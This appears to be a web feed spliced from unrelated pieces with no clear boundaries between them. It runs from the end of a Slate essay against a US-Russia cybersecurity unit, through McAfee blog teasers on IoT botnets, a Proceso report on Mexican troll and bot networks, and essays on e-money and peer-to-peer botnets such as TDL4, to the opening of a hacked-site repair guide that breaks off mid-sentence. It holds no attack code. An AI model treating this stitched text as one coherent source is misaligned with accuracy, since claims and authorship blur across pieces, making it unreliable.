In fairness, it’s unclear who proposed the partnership or how seriously the proposal was intended given Trump’s later claim that it can’t happen. Perhaps it was one of those offhand pleasantries that neither party ever plans to follow through on—like when you run into an old, not-very-close acquaintance on the street and say, “We should get brunch some time and catch up!” even though both of you know you’ll never actually do it, just because it sounds friendlier than “Have a nice life.”

Truly, this would be the best possible tone in which to propose such an alliance. “We should form an impenetrable cybersecurity unit!” “Yes, totally! I’ll email you sometime!” I even understand why that would seem friendlier to all concerned than, well, pretty much any other conversation about cybersecurity that Trump and Putin could possibly have had.

Hear this article on Slate Voice! slate.com/voice

If, however, the joint U.S.-Russia impenetrable unit was a real plan to enmesh Russia more deeply in U.S. cybersecurity efforts, then perhaps Trump changed his mind in light of the roughly 1,000 fox-guarding-the-henhouse Twitter jokes that followed its announcement. Sen. Marco Rubio tweeted Sunday, “Partnering with Putin on a ‘Cyber Security Unit’ is akin to partnering with Assad on a ‘Chemical Weapons Unit’.” Matthew Yglesias went with: “Al Capone & I discussed forming an impenetrable tax evasion unit.” Former Secretary of Defense Ash Carter compared it to “the guy who robbed your house proposing a working group on burglary.”

In case it hasn’t already been made clear to you, it is a stupefyingly bad idea to partner with Vladimir Putin on trying to defend against cyberthreats. If anything, opening our networks to Russian “assistance” and jointly planning our defensive strategies would only make U.S. cyberinfrastructure more vulnerable to attacks from Russia (not that it needs the help).

An international partnership on cybersecurity can mean many things—it can mean mutual assistance with enforcement and criminal investigations, or sharing threat information and intelligence, or jointly developing software that can be used to target adversaries’ computer systems, or even jointly developing tools and techniques that can be used to detect and mitigate threats. An “impenetrable” unit hints most closely at the last of these functions—a defensive joint effort in which the two countries share not just intelligence but also technical expertise and controls to protect their systems against intruders. But people who help design and implement your defenses then know an awful lot about the way your systems work and how, precisely, they are protected. Possibly, they’re even writing code and giving it to you to download on your computers to help make them more impenetrable. And if that code also created backdoors on every computer it was installed on so that Russia had easy access to control those systems, who would be surprised?

International cybersecurity partnerships are usually a good thing. The United States should (and does) work with international allies like Canada, the United Kingdom, France, Germany, South Korea, Australia, and Israel to help strengthen its computer security and enlist help. But to form any kind of meaningful international cybersecurity partnership, two countries have to be able to agree what they’re trying to protect against. If two countries have totally different visions of what a “secure Internet” looks like, then they’re not going to be able to work together to achieve it.

And Russia and the United States have never had compatible ideas about what cybersecurity means—even before the 2016 elections. For instance, the FBI’s most wanted cybercriminal is a man named Evgeniy Mikhailovich Bogachev who for years operated an enormous botnet that he used to steal more than $100 million. Bogachev lives in Anapa, Russia, owns property in Krasnodar, Russia, enjoys boating on the Black Sea—and has never been arrested by Russian authorities. Not only that, but the New York Times reported earlier this year that the Russian government actually relies on Bogachev to provide it with useful intelligence about the victims of his thefts and files from their infected computers. It’s hard to see how two countries could ever get on the same page when it comes to cracking down on cybercrime while one is offering a $3 million reward for any information leading to the arrest of a man who is currently acting as a sort of informal government contractor and consultant in the other.

Bogachev’s story offers a hint of what it might mean if the two countries did try to work together. To form a joint unit (much less an impenetrable one) that does anything beyond offer Russia an up-close look at our cyber defense operations, the two countries would have to reach some kind of consensus on what constitutes cybercrime and cybercriminals. Ideally, that might mean Russian authorities coming around to view someone like Bogachev, who distributes malware and uses it to steal money, as a cybercriminal—but there’s no reason to think they would suddenly have such a change of heart. Alternatively, it could mean the United States deciding to come around to Russia’s perspective and deciding to collect intelligence from cybercriminals rather than arrest them. Russia has used that strategy to great effect—it offers the ability to gather lots of stolen information while still distancing the government from its provenance and, of course, officially condemning cybercrime.

A cybersecurity partnership with Russia would inevitably make the United States weaker. It would make our computer systems weaker by providing information and access about our network infrastructure. It would make our definition of cybercrime weaker by forcing us to collude with a country that harbors some of the most reprehensible cybercriminals in the world. It would make our defensive posture weaker by signaling to other countries that they are free to do what they like to U.S. computers. After all, the only consequences they are likely to face are invitations to please come help us protect ourselves.

This article is part of Future Tense, a collaboration among Arizona State University, New America, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, follow us on Twitter and sign up for our weekly newsletter.


          The IoT of bricks: Someone is bricking insecure IoT devices        

I can’t justify the vigilantism, but someone is bricking vulnerable IoT devices. I ponder the morality of it all. It’s called BrickerBot. It finds IoT devices with dubious security and simply bricks/disables them. Insecure dishwashers, teapots, refrigerators, security cameras – all become part of vast botnets. The botnets can do many things, and we’ve seen …

The post The IoT of bricks: Someone is bricking insecure IoT devices appeared first on McAfee Blogs.


          TinyNuke May be a Ticking Time Bomb        

On March 12th,  2017 a low-profile developer uploaded to Github a mostly functional Botnet code named TinyNuke. The user, Aainz, uses his real name in connection with this code. It’s not unusual for security professionals or hobbyist to release proof of concept code to enable the industry to learn from the latest techniques and test …

The post TinyNuke May be a Ticking Time Bomb appeared first on McAfee Blogs.


          Are Printers Becoming Yet Another IoT-Based Threat?        

Over the past couple of months, a lot has been written about the Mirai botnet that was targeting vulnerable devices connected to the Internet. And based on the embedded password list, we can determine that the targets were diverse– from IP-camera’s, DVR’s, TV receivers, routers to printers. Printers? Yes, printers. Over the years, these devices …

The post Are Printers Becoming Yet Another IoT-Based Threat? appeared first on McAfee Blogs.


          ESRT @alexandrosilva - New Hakin9 available: Botnets, Malware, Syware - How to Fight Back ...        
ESRT @alexandrosilva - New Hakin9 available: Botnets, Malware, Syware - How to Fight Back http://www.secuobs.com/twitter/news/148441.shtml
          Recommended Reads – 26 March 2011        

FireEye Malware Intelligence Lab: An overview of Rustock – “As you might have seen in the news, the largest spam botnet, Rustock, was recently taken down in a collaborated, coordinated way. All parties involved were bound by a sealed federal lawsuit against the John Doe’s involved, but now that … [visit site to read more] [...]

The post Recommended Reads – 26 March 2011 appeared first on Malware Help. Org.


          Mexican Cyber-Mercenaries        
 Translated from Proceso by Erin Gallagher ...follow Erin on Medium


After reporting threats against him, Mexican journalist Alberto Escorcia is more threatened than ever.

The following is a translation of a July 22, 2017 report by Mathieu Tourliere in Proceso magazine...


Mexico City (Proceso): When Alberto Escorcia Gordiano decided to dedicate himself to social network analysis about three years ago, he thought that he entered in a “calmer” world that he could “control.”

However, he started receiving death threats that forced him to leave the country twice. He even had to change his address after two individuals forced the door of his apartment open the night June 9. The police told him that they were “probably thieves,” reports Escorcia in an interview with Proceso.

- What part of your work could set off these attacks? he’s asked.



- I don’t really publish very severe things, but I do show that the cyber attacks and threats are coordinated operations; They’re not just two or three accounts spreading a rumor. My graphs and articles show that they are the product of two or three thousand organized accounts that have a purpose and an impact.


On his website LoQueSigue he revealed that an army of 75,000 bots — fake accounts on social media controlled by computer programs impeded the protests for the disappearance of the 43 normalistas from Ayotzinapa. Escorcia also documented the attacks launched from these accounts against journalists and showed that they reactivated in Alfredo del Mazo’s campaign for governor of Mexico State.

He also documented links between trolls accounts, famous for threatening and harassing journalists, including Carmen Aristegui, Álvaro Delgado, Proceso reporter; Héctor de Mauleón, Denise Dresser, and American journalist Andrea Noel. These accounts “woke up” on the eve of the last state elections and made a dirty war against Delfina Gómez and Josefina Vázquez Mota.
“Something that would seem like a rumor, I make it visible. It’s like with the government spying: for a long time it was denounced by activists, until they had evidence and they could demonstrate it,” he adds.
Escorcia explains that coordinating tens of thousands of bots involves the hiring of dozens of operators — who program the accounts and relaunch discussion topics — at a high level of sophistication. In other words, these methods can’t be done by just anyone.

“All the political parties use them, the PRI especially; The PAN with (Rafael) Moreno Valle, and I’ve even detected that Ricardo Monreal (from Morena) used them,” he says.


Hidden Attackers

Botnets remained “dormant” for months, but reactivated as the Mexican state elections approached: they boosted the messages of Alfredo del Mazo from the PRI and participated in defamation campaigns.

In news portal sinembargo.mx, Escorcia documented that eight out of ten massive bot attacks were carried out against Delfina Gómez. “On election day and the day previous, there were 17 trending topics against Delfina,” he says.

During the campaign, these networks amplified the dissemination of both true and fake news. They were particularly active on April 11, when a helicopter threw leaflets over Texcoco municipality — a Morena bastion in the state — signed by a non-existent group of narco-traffickers. The bots spread that news, and a few days later boosted another piece of fake news that linked that group with the former mayor Higinio Martínez Miranda.

They also activated this past June 3 — the day before the election — when a group of unknown persons left bloody pig heads and crosses at the doors of Morena’s headquarters in the municipality of Tlalnepantla.



“The Mexican government responds to people organizing on social media with spying, repression and internet censorship. One day a researcher is going to realize there’s a relationship between the dirty war and the bots. Everything that happened with Alfredo Del Mazo, which was brutal, certainly influenced some people,” he estimates.

The activist explains that in Mexico there are four main groups of trolls: The Underground — the most violent group who send death threats with the victim’s name spelled out with bullets, the Legión Holk and the Legión Científica made up of large numbers of teenagers, and the Ingenieros, the oldest that changed course since “they practically don’t send threats but make Trending Topics for companies.”

Mexico’s misinformation wars : How organized troll networks attack and harass journalists and activists in Mexico

“They’re like cyber-mercenaries. Of the testimonies I’ve collected, they operate from troll centers that work for various parties and companies. I doubt they plan the attacks. According to my research, the agencies that hire them are the ones who design the campaigns. It may be the Ministry of the Interior or the state governments,” he adds.

The threats online follow the same pattern: a small account launches the message, and then larger accounts boost it, details the activist, and although there is no evidence that the same person or entity is behind the bots, trolls and fake news portals, he notes that those three elements are usually triggered at times that coincide.

“Mental Hell”
Proceso interviewed Escorcia for the first time in October 2014. At that time, he had enthusiastically developed an interactive map of cases of disappearances in Mexico. He described it as a “Wikileaks of the disappeared.”

His features now are more drawn. The last 2.5 years have been a “mental hell” for him.

“I’m very tired now. I hardly published anything on my website. I don’t have the energy I used to, I don’t go to protests anymore. I think it’s drained me. And when I realize the objective was to sow fear, it gives me more courage. Because I am very afraid.”

On December 5 2014, in the middle of the protests for the disappearance of the Ayotzinapa students, Escorcia gave an interview to journalist Carmen Aristegui. Almost 400 threats flooded in from Twitter and his website was attacked.

“You have to understand how it is: your phone doesn’t stop ringing, they curse you, send you pictures of dismembered bodies,” he says.

After that interview, death threats became part of his daily life. And when one of the trolls doxxed him and published his address and phone number online — after he documented the troll networks behind calls to loot shops during the gasolinazo protests, the virtual violence became reality.


[Instead of arresting my attackers, the city government asks whether or not I am working as a journalist]
He suffered assaults and harassment: individuals entered his building asking about him, between January and February they rang his doorbell every night, one day they forced open his neighbor’s door and on at least three occasions men with handheld radios followed him on his way to the subway.

Mexico’s Troll Bots Are Threatening the Lives of Activists

Until recently few people took the attacks on social media seriously. That incomprehension then cast doubt on Escorcia: They wondered, in the midst of murders of journalists and activists, if his case was legitimate or even real.

“More serious things happen. I can’t compare myself with Javier (Valdez, the journalist assassinated on May 15 in Culiacán). Someone knocked on my door and another killed him. Obviously my case is a lesser priority and I understand. But the torment stays with you, and it’s been three years.”

While this was happening, the PGJDF’s investigation (the attorney general of Mexico City) remained stagnant. Last May 12, when he went to the agency’s offices for a routine appearance, he noticed the officials had misplaced key evidence that identified people behind the accounts sending threats, including Daniel Carlos Penagos García, hiding behind the alias Perrito.

He deduced that the authorities had stopped investigating his case, which passed to the  Special Prosecutors’s Office for Crimes Against Freedom of Expression (FEADLE — Fiscalía Especial para la Atención de Delitos Cometidos contra la Libertad de Expresión).
“So if they fail to investigate them and then activate them to attack their political opponents, they are already part of the system. Maybe I have false hope that they will be stopped.” he laments
Below:  Thousands of bots performed in the Edomexcampaign. Delfina the main target of attacks

Click on image to enlarge
This report was published in edition 2124 of Proceso magazine dated July 16, 2017

          E-Money        
E-money is defined by European Commission as “electronically, including magnetically, stored monetary value as represented by a claim on the issuer which is issued on receipt of funds for the purpose of making payment transactions” (European Commission, n.d.). As such, E-money provides the same advantages as cash: real time transaction and anonymity. Ken Griffin et al. (n.d.) note that there are a number of categories of E-money which include E-cash, digital checks, digital banks checks, smart cards and electronic coupons and tokens. There are a number of E-money issues such well known PayPal and less known such as Pecunix, Ukash and Bitcoin. Moreover, virtual world such as SecondLife has its own E-money currency (e.g. L$) which can be earned, spend and exchanged for US dollars (SecondLife, n.d.). As stated previously, the main advantages of E-money are real time transactions, low transaction fees and anonymity similar to real cash transactions. There are, however, concerns about security and fraud, as well as question on financial backup the virtual currency. For example, criminals are targeting Bitcom digital wallets or are using botnet networks to utilize the collective resources to mint virtual currency which can be exchanged for a real money (Peter Coogan, 2011).

Credit cards, on the other hands, are backed by international organizations responsible to issue and acquire credit card transactions. Often, the transaction fees (flat fee or a percent from a transaction) are charged to the merchant. From a end-user standpoint, credit cards are existing and trusted technology whereby the security standard (e.g. Payment Card Industry Data Security Standard) is verified by independent qualified security assessors (QSA). Additional benefits such as CashBack, AirMiles and membership points increase the adoption rate by the consumers. The drawback (which is considered by some consumers as an advantage) is the fact that all purchases are done in credit, and if not paid in full are subject to comparatively high interest rates changed.

It is difficult to compare the security risk between the E-money and the credit card technologies as both had high profile data thefts such as theft of 25,000 Bitcoins from 478 account (Jason Mick, 2011) and “a massive" security breach at a credit card processor has put 10 million accounts at risk” (Brandon Hill, 2012). On both fronts, there are efforts to tighten up the security as evident with Payment Card Industry Data Security Standard (PCI SSC, 2010) and MintChip Challenge by Royal Canadian Mint to create a secure alternative to E-cash backed by the Canadian Government (Emily Jackson, 2012).

With variety of methods to exchange funds (i.e. payment and transfers) electronically such as PayPal, MintChip, Bitcoin, Credit and Debit Cards, it is not surprising that Sweden moving towards cashless economy (CBCNews, 2012) where different digital payment methods are used in parallel serving different purpose (i.e. micro payments) rather than compete with each-other.

Bibliography

  • Brandon Hill, 2012. “Global Payments Inc. Hit By Security Breach; 10M Visa, MasterCard Accounts at Risk” [online]. DailyTech. Available from: http://www.dailytech.com/Massive+Security+Breach+Hits+MasterCard+Visa+10M+Accounts+at+Risk/article24355.htm (accessed: April 14, 2012).
  • CBCNews, 2012. “Sweden moving towards cashless economy” [online]. Available from: http://www.cbsnews.com/8301-202_162-57399610/sweden-moving-towards-cashless-economy/ (accessed: April 14, 2012).
  • Emily Jackson, 2012. “Royal Canadian Mint to create digital currency” [online]. The Star. Available from: http://www.thestar.com/business/article/1159513--royal-canadian-mint-to-create-digital-currency (accessed: April 14, 2012).
  • European Commission, n.d. “e-Money” [online]. Available from: http://ec.europa.eu/internal_market/payments/emoney/index_en.htm (accessed: April 14, 2012).
  • Jason Mick, 2011. “Inside the Mega-Hack of Bitcoin: the Full Story” [online]. DailyTech. Available from: http://www.dailytech.com/Inside+the+MegaHack+of+Bitcoin+the+Full+Story/article21942.htm (accessed: April 14, 2012).
  • Ken Griffin, Phillip Balsmeier, Bobi Doncevski, n.d. “Electronic Money as A Competitive Advantage” [online]. Available from: http://journals.cluteonline.com/index.php/RBIS/article/download/5458/5543&ei=uVKFT-2kBoXh4QSvr4izBQ&usg=AFQjCNFHe4HkbgG7hbdsQzlWnXg1LR7MNA (accessed: April 14, 2012).
  • Payment Card Industry Security Standard Council, 2010. “Payment Card Industry (PCI) Data Security Standard” [online]. Available from: https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf (accessed: April 12, 2012).
  • Ross J. Anderson, 2008. “A Guide to Building Dependable Distributed Systems”. 2nd Edition. Wiley Publishing.
  • SecondLife, n.d. “Buy L$ ” [online]. Available from: https://secondlife.com/my/lindex/buy.php?lang=en_US (accessed: April 14, 2012).
  • Peter Coogan, 2011. “Bitcoin Botnet Mining” [online]. Symantec. Available from: http://www.symantec.com/connect/blogs/bitcoin-botnet-mining (accessed: April 14, 2012).

          Criminal Activity On Peer-To-Peer (P2P) Networks        

Criminal activity on peer-to-peer (P2P) networks are usually associated with sharing of illegal such as copyrighted or offensive material (music, movies, snuff films or pornography). There are a number of cases when a law enforcement agencies successfully taken down the sites such as the case with Elite Torrents group (Charles Montaldo, 2005). But recently different peer-to-peer protocols such BitTorrent and Kad are being used to command and control an army of digital zombies (botnet). Botnet, controlled by a botmaster, can be used to attacks such as spam and denial of service.
As bots are getting more and more sophisticated allowing the controller to capture keystrokes, take screen shots, send spam and participate in denial of service attacks, and much harder to detect due to inclusion of rootkit capabilities, “the most significant feature, however, is the inclusion of peer-to-peer technology in the latest version of the botnet's code” (Peter Bright, 2011). Moreover, some bots allow controllers to “sublet”, for a price, an IP address to be used as anonymous proxy.
Peer-to-peer technology allows hacker to eliminate a “single point of failure” - a single (sometimes multiple) Internet Relay Chat (IRC) server or a Really Simple Syndication (RSS) feed to command the botnet. Over the years, there were a number of attempts by a botnet developers to develop the next generation utilizing peer-to-peer control mechanism such as “Slapper, Sinit, Phatbot and Nugache have implemented different kinds of P2P control architectures” (Ping Wang, Sherri Sparks, Cliff C. Zou, 2007), each with its weaknesses. For example, Sinit bot used random probing techniques to discover other Sinit infected machines which resulted in easily detected network traffic. Insecure implementation of authentication mechanism made Slapper easy to hijack. Whereas Nugache contained a list of static IP addresses used as initial seed (David Dittrich, Steven Dietrich 2008) (David Dittrich, Steven Dietrich 2009).
Modern implementation of the bots utilizing peer-to-peer protocol with combination of encryption (based on TLS/SSL) of the network traffic, public-key based authentication mechanism, randomly used ports with protocol mimicking to avoid anomalies detection on the network level and prevent hijacking of the botnet network by competing botmasters and law enforcement agencies. The TDL4 (or Alureon) dubbed as “the ‘indestructible’ botnet” and it is running on over 4.5 million infected computers at the time of writing (Sergey Golovanov, Igor Soumenkov 2011).
To make botnet more resilient, a hierarchical structure is used with each servant (a hybrid of bot and server) communicates with a small subset of bots, and each not contains a small list of other peers (in case servant is not available). The servants themselves are rotated (dynamic) and updated periodically to prevent capturing and disturbing the botnet network. Locally, the malware uses rootkit functionality to avoid detection by anti-viruses. For example, Alureon botnet “infects the system's master boot record (MBR), part of a hard disk that contains critical code used to boot the operating system” (Peter Bright 2011), meaning that rootkit is loaded before operating system and an antivirus software.
Forensic investigation of crime involved advanced peer-to-peer botnet involves a combination of reverse engineering, operating system and network forensic. For example, TDL4 infects victims MBR which, up on investigation, immediately identify the presence of the rootkit. Moreover, a presence of certain files (recoverable from offline forensic image) such as cfg.ini and ktzerules in certain locations could indicate infection. On a network level, upon infection the malware downloads and “installs nearly 30 additional malicious programs, including fake antivirus programs, adware, and the Pushdo spambot” (Sergey Golovanov, Igor Soumenkov 2011) making it possible to monitor and detect the botnet activity.

References


          More On Clouds & Botnets: MeatClouds, CloudFlux, LeapFrog, EDoS and More!        
After my "Frogs" talk at Source Boston yesterday, Adam O'Donnell and I chatted about one of my chuckle slides I threw up in the presentation in which I give some new names to some (perhaps not new) attack/threat scenarios which...
          Stronger IoT Passwords to Prevent Mirai Botnet Attacks        

By Naren Ubi

The Dyn DNS attack that happened last year is the largest distributed denial of service (DDoS) attack on record, simply because of the enormity of the connected devices involved and the number of businesses that were impacted by it. The Mirai malware, responsible for this attack, compromised hundreds of thousands of connected devices with default […]

Originally from Stronger IoT Passwords to Prevent Mirai Botnet Attacks on Ubiquitense


          How to prevent your site from getting hacked.        

 How to repair a damaged site

[This article is frequently updated and expanded. It is gradually being broken apart into separate articles because the Google language translator doesn't translate all the text of large pages.]
[Contrary to one of the tags applied to this article at StumbleUpon, this site has never been hacked in more than 1,000,000 attempts. Everything reported here is based on experience gained from helping others with compromised sites and from continual study about improved methods of protection.]


Step-by-step site repair

  • Hopefullly, this detailed step-by-step procedure will help focus on the tasks and avoid panic.
  • The concepts apply to any server even though it is Linux, Apache, and cPanel methods that are described in detail.
  • The steps are in order of priority if the evidence you've found so far hasn't already given you a clear idea what things to focus on first.
The reason these procedures are described in so much detail is so that people who have never done them don't have to go hunting around the web for specifics. If you already know the specifics, you'll see that the steps are much less complicated than they look at first glance, and you can skip the long explanations.
If you just start at step 1, focus, and dive in, what you learn now will help you manage your site with a lot more confidence in the future. These are all useful things to know how to do. You might even wind up feeling like an expert.

What not to do

Don't just repair the damaged files and hope this experience doesn't happen again. That is not enough.
Nobody is ever supposed to be able to add, delete, or change files in your website without your permission. It should never happen, and it usually doesn't. Most websites don't get hacked. If yours did, there is something wrong with it, or with the server, or with the webhost, or with the security on your PC. You have to figure out how this happened so you can prevent it from happening again.
Ok, let's get started... The checkboxes don't do anything. You can check them to help keep your place as you go.

1) Log into cPanel

Most webhosts provide some kind of control panel such as cPanel or Plesk where you can manage your website's configuration and files. One reason for logging in now is to check for unauthorized logins as described below. The more important reason is to make sure you know how to do it, because several of the later steps are done in control panel.
If you've never logged into your control panel before now, go to the home page of your webhost's website and look for a customer login box. If there isn't one, look for a FAQ page where they might describe how to access your control panel. If you still find nothing, file a support ticket and ask them. 
In cPanel (and possibly in Plesk), the line that says "Last login from:" should always be your IP address from the last time you logged in. If it isn't, write it down.
If you don't know your IP address, it appears to be 27.60.39.174, but that could be incorrect if you are viewing an old copy of this page from your browser cache or a search engine cache. You can find your IP address in Windows XP by either of these two methods (you must be connected to the internet at the time you do this):
  • Click on the internet connection icon in your system tray (lower right of screen) Internet Connection icon in Windows XP system tray. In the dialog box that opens, click the Details tab, and then read the line that says Client IP address
     
  • Open a Command Prompt and run the ipconfig program:
    start > Run > cmd
    Type: ipconfig
    Read the line that says IP Address
    Type: exit
With high-speed (broadband, DSL, cable) internet service, your IP is always the same. With dial-up, it's different each time you log on.
If someone was able to log in to your control panel (like you do), they have your userID, password, and all the same access to your site that you have. They can probably also get FTP access, which is what they are more likely to use than cPanel. However, before you assume the worst, an unfamiliar IP could be legitimate if your site is at a webhosting company and you recently submitted a support ticket. A technician might have logged into your account while investigating.
The three pieces of information you should keep from this step are:
  1. How to log in to your control panel.
  2. Your legitimate IP address, so you can recognize IP addresses that are not yours in places where only yours should be.
  3. Suspicious IP addresses you find reported in cPanel.
Leave cPanel open for the next two steps.

2) Enable log archiving in cPanel

Your website access logs keep detailed records of who connects to your site by HTTP (normal visitors) and by FTP (file transfers such as when you publish pages). By default, those logs are deleted every day after the stats run (Webalizer, AWStats, ...). Log archiving forces